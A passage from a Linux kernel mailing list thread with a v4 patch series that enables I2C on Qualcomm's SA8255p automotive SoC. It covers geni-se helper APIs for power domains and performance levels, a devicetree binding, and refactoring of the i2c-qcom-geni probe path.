"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:14 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states(on/off).
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
The GENI Serial Engine drivers (I2C, SPI, and SERIAL) currently handle
the attachment of power domains. This often leads to duplicated code
logic across different driver probe functions.
Introduce a new helper API, geni_se_domain_attach(), to centralize
the logic for attaching "power" and "perf" domains to the GENI SE
device.
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v3->v4
Konrad
- Updated function documentation
---
drivers/soc/qcom/qcom-geni-se.c | 29 +++++++++++++++++++++++++++++
include/linux/soc/qcom/geni-se.h | 4 ++++
2 files changed, 33 insertions(+)
diff --git a/drivers/soc/qcom/qcom-geni-se.c b/drivers/soc/qcom/qcom-geni-se.c
index 17ab5bbeb621..d80ae6c36582 100644
--- a/drivers/soc/qcom/qcom-geni-se.c
+++ b/drivers/soc/qcom/qcom-geni-se.c
@@ -19,6 +19,7 @@
#include <linux/of_platform.h>
#include <linux/pinctrl/consumer.h>
#include <linux/platform_device.h>
+#include <linux/pm_domain.h>
#include <linux/pm_opp.h>
#include <linux/soc/qcom/geni-se.h>
@@ -1092,6 +1093,34 @@ int geni_se_resources_activate(struct geni_se *se)
}
EXPORT_SYMBOL_GPL(geni_se_resources_activate);
+/**
+ * geni_se_domain_attach() - Attach power domains to a GENI SE device.
+ * @se: Pointer to the geni_se structure representing the GENI SE device.
+ *
+ * This function attaches the power domains ("power" and "perf") required
+ * in the SCMI auto-VM environment to the GENI Serial Engine device. It
+ * initializes se->pd_list with the attached domains.
+ *
+ * Return: 0 on success, or a negative error code on failure.
+ */
+int geni_se_domain_attach(struct geni_se *se)
+{
+ struct dev_pm_domain_attach_data pd_data = {
+ .pd_flags = PD_FLAG_DEV_LINK_ON,
+ .pd_names = (const char*[]) { "power", "perf" },
+ .num_pd_names = 2,
+ };
+ int ret;
+
+ ret = dev_pm_domain_attach_list(se->dev,
+ &pd_data, &se->pd_list);
+ if (ret <= 0)
+ return -EINVAL;
+
+ return 0;
+}
+EXPORT_SYMBOL_GPL(geni_se_domain_attach);
+
/**
* geni_se_resources_init() - Initialize resources for a GENI SE device.
* @se: Pointer to the geni_se structure representing the GENI SE device.
diff --git a/include/linux/soc/qcom/geni-se.h b/include/linux/soc/qcom/geni-se.h
index 36a68149345c..5f75159c5531 100644
--- a/include/linux/soc/qcom/geni-se.h
+++ b/include/linux/soc/qcom/geni-se.h
@@ -64,6 +64,7 @@ struct geni_icc_path {
* @num_clk_levels: Number of valid clock levels in clk_perf_tbl
* @clk_perf_tbl: Table of clock frequency input to serial engine clock
* @icc_paths: Array of ICC paths for SE
+ * @pd_list: Power domain list for managing power domains
* @has_opp: Indicates if OPP is supported
*/
struct geni_se {
@@ -75,6 +76,7 @@ struct geni_se {
unsigned int num_clk_levels;
unsigned long *clk_perf_tbl;
struct geni_icc_path icc_paths[3];
+ struct dev_pm_domain_list *pd_list;
bool has_opp;
};
@@ -546,5 +548,7 @@ int geni_se_resources_activate(struct geni_se *se);
int geni_se_resources_deactivate(struct geni_se *se);
int geni_load_se_firmware(struct geni_se *se, enum geni_se_protocol_type protocol);
+
+int geni_se_domain_attach(struct geni_se *se);
#endif
#endif
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:15 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states(on/off).
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
The GENI Serial Engine (SE) drivers (I2C, SPI, and SERIAL) currently
manage performance levels and operating points directly. This resulting
in code duplication across drivers. such as configuring a specific level
or find and apply an OPP based on a clock frequency.
Introduce two new helper APIs, geni_se_set_perf_level() and
geni_se_set_perf_opp(), addresses this issue by providing a streamlined
method for the GENI Serial Engine (SE) drivers to find and set the OPP
based on the desired performance level, thereby eliminating redundancy.
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
drivers/soc/qcom/qcom-geni-se.c | 50 ++++++++++++++++++++++++++++++++
include/linux/soc/qcom/geni-se.h | 4 +++
2 files changed, 54 insertions(+)
diff --git a/drivers/soc/qcom/qcom-geni-se.c b/drivers/soc/qcom/qcom-geni-se.c
index d80ae6c36582..2241d1487031 100644
--- a/drivers/soc/qcom/qcom-geni-se.c
+++ b/drivers/soc/qcom/qcom-geni-se.c
@@ -282,6 +282,12 @@ struct se_fw_hdr {
#define geni_setbits32(_addr, _v) writel(readl(_addr) | (_v), _addr)
#define geni_clrbits32(_addr, _v) writel(readl(_addr) & ~(_v), _addr)
+enum domain_idx {
+ DOMAIN_IDX_POWER,
+ DOMAIN_IDX_PERF,
+ DOMAIN_IDX_MAX
+};
+
/**
* geni_se_get_qup_hw_version() - Read the QUP wrapper Hardware version
* @se: Pointer to the corresponding serial engine.
@@ -1093,6 +1099,50 @@ int geni_se_resources_activate(struct geni_se *se)
}
EXPORT_SYMBOL_GPL(geni_se_resources_activate);
+/**
+ * geni_se_set_perf_level() - Set performance level for GENI SE.
+ * @se: Pointer to the struct geni_se instance.
+ * @level: The desired performance level.
+ *
+ * Sets the performance level by directly calling dev_pm_opp_set_level
+ * on the performance device associated with the SE.
+ *
+ * Return: 0 on success, or a negative error code on failure.
+ */
+int geni_se_set_perf_level(struct geni_se *se, unsigned long level)
+{
+ return dev_pm_opp_set_level(se->pd_list->pd_devs[DOMAIN_IDX_PERF], level);
+}
+EXPORT_SYMBOL_GPL(geni_se_set_perf_level);
+
+/**
+ * geni_se_set_perf_opp() - Set performance OPP for GENI SE by frequency.
+ * @se: Pointer to the struct geni_se instance.
+ * @clk_freq: The requested clock frequency.
+ *
+ * Finds the nearest operating performance point (OPP) for the given
+ * clock frequency and applies it to the SE's performance device.
+ *
+ * Return: 0 on success, or a negative error code on failure.
+ */
+int geni_se_set_perf_opp(struct geni_se *se, unsigned long clk_freq)
+{
+ struct device *perf_dev = se->pd_list->pd_devs[DOMAIN_IDX_PERF];
+ struct dev_pm_opp *opp;
+ int ret;
+
+ opp = dev_pm_opp_find_freq_floor(perf_dev, &clk_freq);
+ if (IS_ERR(opp)) {
+ dev_err(se->dev, "failed to find opp for freq %lu\n", clk_freq);
+ return PTR_ERR(opp);
+ }
+
+ ret = dev_pm_opp_set_opp(perf_dev, opp);
+ dev_pm_opp_put(opp);
+ return ret;
+}
+EXPORT_SYMBOL_GPL(geni_se_set_perf_opp);
+
/**
* geni_se_domain_attach() - Attach power domains to a GENI SE device.
* @se: Pointer to the geni_se structure representing the GENI SE device.
diff --git a/include/linux/soc/qcom/geni-se.h b/include/linux/soc/qcom/geni-se.h
index 5f75159c5531..c5e6ab85df09 100644
--- a/include/linux/soc/qcom/geni-se.h
+++ b/include/linux/soc/qcom/geni-se.h
@@ -550,5 +550,9 @@ int geni_se_resources_deactivate(struct geni_se *se);
int geni_load_se_firmware(struct geni_se *se, enum geni_se_protocol_type protocol);
int geni_se_domain_attach(struct geni_se *se);
+
+int geni_se_set_perf_level(struct geni_se *se, unsigned long level);
+
+int geni_se_set_perf_opp(struct geni_se *se, unsigned long clk_freq);
#endif
#endif
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:16 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states(on/off).
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
Add DT bindings for the QUP GENI I2C controller on sa8255p platforms.
SA8255p platform abstracts resources such as clocks, interconnect and
GPIO pins configuration in Firmware. SCMI power and perf protocol
are utilized to request resource configurations.
SA8255p platform does not require the Serial Engine (SE) common properties
as the SE firmware is loaded and managed by the TrustZone (TZ) secure
environment.
Reviewed-by: Krzysztof Kozlowski <krzysztof.kozlowski@oss.qualcomm.com>
Co-developed-by: Nikunj Kela <quic_nkela@quicinc.com>
Signed-off-by: Nikunj Kela <quic_nkela@quicinc.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v2->v3:
- Added Reviewed-by tag
v1->v2:
Krzysztof:
- Added dma properties in example node
- Removed minItems from power-domains property
- Added in commit text about common property
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 +++++++++++++++++++
1 file changed, 64 insertions(+)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
diff --git a/Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml b/Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
new file mode 100644
index 000000000000..a61e40b5cbc1
--- /dev/null
+++ b/Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
@@ -0,0 +1,64 @@
+# SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
+%YAML 1.2
+---
+$id: http://devicetree.org/schemas/i2c/qcom,sa8255p-geni-i2c.yaml#
+$schema: http://devicetree.org/meta-schemas/core.yaml#
+
+title: Qualcomm SA8255p QUP GENI I2C Controller
+
+maintainers:
+ - Praveen Talari <praveen.talari@oss.qualcomm.com>
+
+properties:
+ compatible:
+ const: qcom,sa8255p-geni-i2c
+
+ reg:
+ maxItems: 1
+
+ dmas:
+ maxItems: 2
+
+ dma-names:
+ items:
+ - const: tx
+ - const: rx
+
+ interrupts:
+ maxItems: 1
+
+ power-domains:
+ maxItems: 2
+
+ power-domain-names:
+ items:
+ - const: power
+ - const: perf
+
+required:
+ - compatible
+ - reg
+ - interrupts
+ - power-domains
+
+allOf:
+ - $ref: /schemas/i2c/i2c-controller.yaml#
+
+unevaluatedProperties: false
+
+examples:
+ - |
+ #include <dt-bindings/interrupt-controller/arm-gic.h>
+ #include <dt-bindings/dma/qcom-gpi.h>
+
+ i2c@a90000 {
+ compatible = "qcom,sa8255p-geni-i2c";
+ reg = <0xa90000 0x4000>;
+ interrupts = <GIC_SPI 357 IRQ_TYPE_LEVEL_HIGH>;
+ dmas = <&gpi_dma0 0 0 QCOM_GPI_I2C>,
+ <&gpi_dma0 1 0 QCOM_GPI_I2C>;
+ dma-names = "tx", "rx";
+ power-domains = <&scmi0_pd 0>, <&scmi0_dvfs 0>;
+ power-domain-names = "power", "perf";
+ };
+...
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:17 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states(on/off).
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
Moving the serial engine setup to geni_i2c_init() API for a cleaner
probe function and utilizes the PM runtime API to control resources
instead of direct clock-related APIs for better resource management.
Enables reusability of the serial engine initialization like
hibernation and deep sleep features where hardware context is lost.
Acked-by: Viken Dadhaniya <viken.dadhaniya@oss.qualcomm.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v3->v4:
viken:
- Added Acked-by tag
- Removed extra space before invoke of geni_i2c_init().
v1->v2:
Bjorn:
- Updated commit text.
---
drivers/i2c/busses/i2c-qcom-geni.c | 158 ++++++++++++++---------------
1 file changed, 75 insertions(+), 83 deletions(-)
diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
index ae609bdd2ec4..81ed1596ac9f 100644
--- a/drivers/i2c/busses/i2c-qcom-geni.c
+++ b/drivers/i2c/busses/i2c-qcom-geni.c
@@ -977,10 +977,77 @@ static int setup_gpi_dma(struct geni_i2c_dev *gi2c)
return ret;
}
+static int geni_i2c_init(struct geni_i2c_dev *gi2c)
+{
+ const struct geni_i2c_desc *desc = NULL;
+ u32 proto, tx_depth;
+ bool fifo_disable;
+ int ret;
+
+ ret = pm_runtime_resume_and_get(gi2c->se.dev);
+ if (ret < 0) {
+ dev_err(gi2c->se.dev, "error turning on device :%d\n", ret);
+ return ret;
+ }
+
+ proto = geni_se_read_proto(&gi2c->se);
+ if (proto == GENI_SE_INVALID_PROTO) {
+ ret = geni_load_se_firmware(&gi2c->se, GENI_SE_I2C);
+ if (ret) {
+ dev_err_probe(gi2c->se.dev, ret, "i2c firmware load failed ret: %d\n", ret);
+ goto err;
+ }
+ } else if (proto != GENI_SE_I2C) {
+ ret = dev_err_probe(gi2c->se.dev, -ENXIO, "Invalid proto %d\n", proto);
+ goto err;
+ }
+
+ desc = device_get_match_data(gi2c->se.dev);
+ if (desc && desc->no_dma_support) {
+ fifo_disable = false;
+ gi2c->no_dma = true;
+ } else {
+ fifo_disable = readl_relaxed(gi2c->se.base + GENI_IF_DISABLE_RO) & FIFO_IF_DISABLE;
+ }
+
+ if (fifo_disable) {
+ /* FIFO is disabled, so we can only use GPI DMA */
+ gi2c->gpi_mode = true;
+ ret = setup_gpi_dma(gi2c);
+ if (ret)
+ goto err;
+
+ dev_dbg(gi2c->se.dev, "Using GPI DMA mode for I2C\n");
+ } else {
+ gi2c->gpi_mode = false;
+ tx_depth = geni_se_get_tx_fifo_depth(&gi2c->se);
+
+ /* I2C Master Hub Serial Elements doesn't have the HW_PARAM_0 register */
+ if (!tx_depth && desc)
+ tx_depth = desc->tx_fifo_depth;
+
+ if (!tx_depth) {
+ ret = dev_err_probe(gi2c->se.dev, -EINVAL,
+ "Invalid TX FIFO depth\n");
+ goto err;
+ }
+
+ gi2c->tx_wm = tx_depth - 1;
+ geni_se_init(&gi2c->se, gi2c->tx_wm, tx_depth);
+ geni_se_config_packing(&gi2c->se, BITS_PER_BYTE,
+ PACKING_BYTES_PW, true, true, true);
+
+ dev_dbg(gi2c->se.dev, "i2c fifo/se-dma mode. fifo depth:%d\n", tx_depth);
+ }
+
+err:
+ pm_runtime_put(gi2c->se.dev);
+ return ret;
+}
+
static int geni_i2c_probe(struct platform_device *pdev)
{
struct geni_i2c_dev *gi2c;
- u32 proto, tx_depth, fifo_disable;
int ret;
struct device *dev = &pdev->dev;
const struct geni_i2c_desc *desc = NULL;
@@ -1060,102 +1127,27 @@ static int geni_i2c_probe(struct platform_device *pdev)
if (ret)
return ret;
- ret = clk_prepare_enable(gi2c->core_clk);
- if (ret)
- return ret;
-
- ret = geni_se_resources_on(&gi2c->se);
- if (ret) {
- dev_err_probe(dev, ret, "Error turning on resources\n");
- goto err_clk;
- }
- proto = geni_se_read_proto(&gi2c->se);
- if (proto == GENI_SE_INVALID_PROTO) {
- ret = geni_load_se_firmware(&gi2c->se, GENI_SE_I2C);
- if (ret) {
- dev_err_probe(dev, ret, "i2c firmware load failed ret: %d\n", ret);
- goto err_resources;
- }
- } else if (proto != GENI_SE_I2C) {
- ret = dev_err_probe(dev, -ENXIO, "Invalid proto %d\n", proto);
- goto err_resources;
- }
-
- if (desc && desc->no_dma_support) {
- fifo_disable = false;
- gi2c->no_dma = true;
- } else {
- fifo_disable = readl_relaxed(gi2c->se.base + GENI_IF_DISABLE_RO) & FIFO_IF_DISABLE;
- }
-
- if (fifo_disable) {
- /* FIFO is disabled, so we can only use GPI DMA */
- gi2c->gpi_mode = true;
- ret = setup_gpi_dma(gi2c);
- if (ret)
- goto err_resources;
-
- dev_dbg(dev, "Using GPI DMA mode for I2C\n");
- } else {
- gi2c->gpi_mode = false;
- tx_depth = geni_se_get_tx_fifo_depth(&gi2c->se);
-
- /* I2C Master Hub Serial Elements doesn't have the HW_PARAM_0 register */
- if (!tx_depth && desc)
- tx_depth = desc->tx_fifo_depth;
-
- if (!tx_depth) {
- ret = dev_err_probe(dev, -EINVAL,
- "Invalid TX FIFO depth\n");
- goto err_resources;
- }
-
- gi2c->tx_wm = tx_depth - 1;
- geni_se_init(&gi2c->se, gi2c->tx_wm, tx_depth);
- geni_se_config_packing(&gi2c->se, BITS_PER_BYTE,
- PACKING_BYTES_PW, true, true, true);
-
- dev_dbg(dev, "i2c fifo/se-dma mode. fifo depth:%d\n", tx_depth);
- }
-
- clk_disable_unprepare(gi2c->core_clk);
- ret = geni_se_resources_off(&gi2c->se);
- if (ret) {
- dev_err_probe(dev, ret, "Error turning off resources\n");
- goto err_dma;
- }
-
- ret = geni_icc_disable(&gi2c->se);
- if (ret)
- goto err_dma;
-
gi2c->suspended = 1;
pm_runtime_set_suspended(gi2c->se.dev);
pm_runtime_set_autosuspend_delay(gi2c->se.dev, I2C_AUTO_SUSPEND_DELAY);
pm_runtime_use_autosuspend(gi2c->se.dev);
pm_runtime_enable(gi2c->se.dev);
+ ret = geni_i2c_init(gi2c);
+ if (ret < 0) {
+ pm_runtime_disable(gi2c->se.dev);
+ return ret;
+ }
+
ret = i2c_add_adapter(&gi2c->adap);
if (ret) {
dev_err_probe(dev, ret, "Error adding i2c adapter\n");
pm_runtime_disable(gi2c->se.dev);
- goto err_dma;
+ return ret;
}
dev_dbg(dev, "Geni-I2C adaptor successfully added\n");
- return ret;
-
-err_resources:
- geni_se_resources_off(&gi2c->se);
-err_clk:
- clk_disable_unprepare(gi2c->core_clk);
-
- return ret;
-
-err_dma:
- release_gpi_dma(gi2c);
-
return ret;
}
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:18 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states(on/off).
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
Refactor the resource initialization in geni_i2c_probe() by introducing
a new geni_i2c_resources_init() function and utilizing the common
geni_se_resources_init() framework and clock frequency mapping, making the
probe function cleaner.
Acked-by: Viken Dadhaniya <viken.dadhaniya@oss.qualcomm.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v3->v4:
- Added Acked-by tag.
v1->v2:
- Updated commit text.
---
drivers/i2c/busses/i2c-qcom-geni.c | 53 ++++++++++++------------------
1 file changed, 21 insertions(+), 32 deletions(-)
diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
index 81ed1596ac9f..56eebefda75f 100644
--- a/drivers/i2c/busses/i2c-qcom-geni.c
+++ b/drivers/i2c/busses/i2c-qcom-geni.c
@@ -1045,6 +1045,23 @@ static int geni_i2c_init(struct geni_i2c_dev *gi2c)
return ret;
}
+static int geni_i2c_resources_init(struct geni_i2c_dev *gi2c)
+{
+ int ret;
+
+ ret = geni_se_resources_init(&gi2c->se);
+ if (ret)
+ return ret;
+
+ ret = geni_i2c_clk_map_idx(gi2c);
+ if (ret)
+ return dev_err_probe(gi2c->se.dev, ret, "Invalid clk frequency %d Hz\n",
+ gi2c->clk_freq_out);
+
+ return geni_icc_set_bw_ab(&gi2c->se, GENI_DEFAULT_BW, GENI_DEFAULT_BW,
+ Bps_to_icc(gi2c->clk_freq_out));
+}
+
static int geni_i2c_probe(struct platform_device *pdev)
{
struct geni_i2c_dev *gi2c;
@@ -1064,16 +1081,6 @@ static int geni_i2c_probe(struct platform_device *pdev)
desc = device_get_match_data(&pdev->dev);
- if (desc && desc->has_core_clk) {
- gi2c->core_clk = devm_clk_get(dev, "core");
- if (IS_ERR(gi2c->core_clk))
- return PTR_ERR(gi2c->core_clk);
- }
-
- gi2c->se.clk = devm_clk_get(dev, "se");
- if (IS_ERR(gi2c->se.clk) && !has_acpi_companion(dev))
- return PTR_ERR(gi2c->se.clk);
-
ret = device_property_read_u32(dev, "clock-frequency",
&gi2c->clk_freq_out);
if (ret) {
@@ -1088,16 +1095,15 @@ static int geni_i2c_probe(struct platform_device *pdev)
if (gi2c->irq < 0)
return gi2c->irq;
- ret = geni_i2c_clk_map_idx(gi2c);
- if (ret)
- return dev_err_probe(dev, ret, "Invalid clk frequency %d Hz\n",
- gi2c->clk_freq_out);
-
gi2c->adap.algo = &geni_i2c_algo;
init_completion(&gi2c->done);
spin_lock_init(&gi2c->lock);
platform_set_drvdata(pdev, gi2c);
+ ret = geni_i2c_resources_init(gi2c);
+ if (ret)
+ return ret;
+
/* Keep interrupts disabled initially to allow for low-power modes */
